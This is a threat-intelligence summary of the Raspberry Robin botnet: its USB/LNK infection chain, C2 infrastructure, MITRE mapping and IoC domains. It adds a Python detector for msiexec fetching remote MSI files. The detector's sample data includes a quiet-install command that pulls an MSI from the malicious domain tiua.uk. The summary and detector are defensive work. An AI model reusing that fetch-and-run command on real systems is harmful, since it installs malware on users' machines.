Raspberry Robin is a Pay-Per-Install botnet that spreads via infected USB drives: an LNK file launches msiexec to download the MSI payload from a compromised QNAP NAS, after which the botnet distributes other malware and enables hands-on-keyboard ransomware. The infrastructure is dynamic, using compromised QNAPs and Linode VPS as cascading C2 layers with frequent domain changes, and it may be repurposed by other actors or hijacked to create a "second life." Hashtags: #RaspberryRobin #EvilCorp #SocGholish #Dridex #QNAPWorm
Keypoints
- Raspberry Robin propagates via infected USB drives; an LNK launches msiexec to download the MSI payload from a compromised QNAP NAS.
- It employs 14 layers of obfuscation and TOR rendezvous for its communications to stay undetected.
- The botnet acts as a Pay-Per-Install platform to drop other malware (e.g., SocGholish, Bumblebee, TrueBot, IcedID) and enable hands-on-keyboard ransomware deployment.
- The infrastructure relies on compromised QNAP devices as first-level C2 validators and Linode VPS as forward proxies, with a large and changing set of domains (270+ known domains by end of 2022).
- A partial takedown on 26 October 2022 disrupted about 80 domains (roughly 30% of the total), with DNS zones deleted and domain statuses adjusted.
- The "second life" risk remains high: msiexec could be hijacked to fetch rogue MSI payloads, with sinkholed domains like tiua.uk and gloa.in illustrating how the threat can be repurposed over time.
MITRE Techniques
- [T1204] User Execution: Malicious File. The infected drive contains an LNK (Windows shortcut). When the user plugs in the thumb drive and opens the LNK, which is disguised as the thumb drive itself or as a network share, it launches the Windows utility msiexec.
- [T1105] Ingress Tool Transfer. The malware retrieves its main component by downloading an MSI from a compromised QNAP instance.
- [T1027] Obfuscated/Compressed Files and Information. The malware uses 14 layers of obfuscation and TOR rendezvous for its communications to remain undetected.
- [T1583] Acquire Infrastructure. Between July 2021 and the end of 2022 the actors acquired more than 270 domain names to operate the infrastructure.
- [T1090] Proxy: External Proxy / Multi-hop Proxy. The malware uses TOR rendezvous for its communications.
- [T1071.001] Web Protocols. The infrastructure uses domain names as its first C2 level and redirects traffic through proxy layers.
Indicators of Compromise
- [Domain] tiua.uk: one of the first domains used by Raspberry Robin LNKs to download and execute an MSI payload.
- [Domain] gloa.in: another early domain used in the infection chain.
- [Domain] ynns.uk: sinkholed domain that helped identify victims in additional countries.
- [Domain] myqnapcloud.com: used as part of the compromised QNAP C2 infrastructure.
- [URL] https://tinyurl.com/mtubjvxr: referenced as a known related domain collection for Raspberry Robin infrastructure.
- [Port] 20001: port observed on the Linode VPS level used as part of forward-proxy communications.
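The initial-access chain above (an LNK on removable media launching msiexec with a remote MSI URL, per T1204/T1105) is easy to hunt for in process-creation telemetry because legitimate MSI installs almost always point at a local file. The script below is an added example for this summary, not code from Sekoia or the original post: it parses simplified, constructed Sysmon-style process-creation lines (a `key=value|key=value` layout that is an assumption of this example, not a real Sysmon format), flags any `msiexec.exe` whose command line carries an `http://` or `https://` URL, and raises the severity when the host matches the domains listed in the IoC section. The sample events, hostnames such as `example-cdn.test`, and the URL paths are all made up for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample process-creation events (simplified key=value|... layout,
# loosely modelled on Sysmon Event ID 1 fields). Not real telemetry.
SAMPLE_EVENTS = [
    # Raspberry Robin-style launch: explorer.exe (user double-clicked the LNK)
    # spawns msiexec with a quiet install of a remote MSI from a known domain.
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=msiexec /q /i http://tiua.uk/x/DESKTOP-1234",
    # Benign: local MSI install.
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=msiexec /i C:\\Users\\bob\\Downloads\\7zip.msi",
    # Suspicious but not a known IoC: remote MSI from an unlisted host (constructed).
    "Image=C:\\Windows\\System32\\msiexec.exe|ParentImage=C:\\Windows\\System32\\cmd.exe"
    "|CommandLine=MSIEXEC /Q /I https://example-cdn.test/setup.msi",
    # Unrelated process, should be ignored.
    "Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad.exe readme.txt",
]

# Domains taken from the IoC list in this summary.
KNOWN_DOMAINS = {"tiua.uk", "gloa.in", "ynns.uk"}

# Captures the host part of an http(s) URL; the character class stops at ':' so an
# explicit port is not included in the host.
URL_RE = re.compile(r"https?://([^\s/:\"']+)", re.IGNORECASE)


@dataclass
class Finding:
    severity: str      # "high" for a known IoC domain, "medium" otherwise
    domain: str        # host extracted from the msiexec command line
    parent: str        # parent image, useful for triage (explorer.exe = interactive)
    command_line: str


def parse_event(line: str) -> dict:
    """Split a constructed 'k=v|k=v' event line into a dict (first '=' only)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def analyze_event(line: str) -> Optional[Finding]:
    """Return a Finding when msiexec is invoked with a remote MSI URL, else None."""
    ev = parse_event(line)
    image = ev.get("Image", "").lower()
    if not image.endswith("\\msiexec.exe"):
        return None
    cmd = ev.get("CommandLine", "")
    match = URL_RE.search(cmd)
    if match is None:
        return None  # local MSI path: not the remote-fetch pattern
    host = match.group(1).lower()
    severity = "high" if host in KNOWN_DOMAINS else "medium"
    return Finding(severity, host, ev.get("ParentImage", ""), cmd)


def analyze_events(lines) -> list:
    """Run the detector over an iterable of event lines and keep the hits."""
    return [f for f in map(analyze_event, lines) if f is not None]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.domain} <- {finding.parent}: {finding.command_line}")
```

In a real deployment the `medium` hits are the interesting ones for hunting: the known-domain list on this page ages quickly given the 270+ domains and frequent rotation described above, so the behavioural condition (msiexec plus a remote URL, especially with a quiet-install switch and an interactive parent) should carry the detection rather than the IoC match.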
Read more: https://blog.sekoia.io/raspberry-robins-botnet-second-life/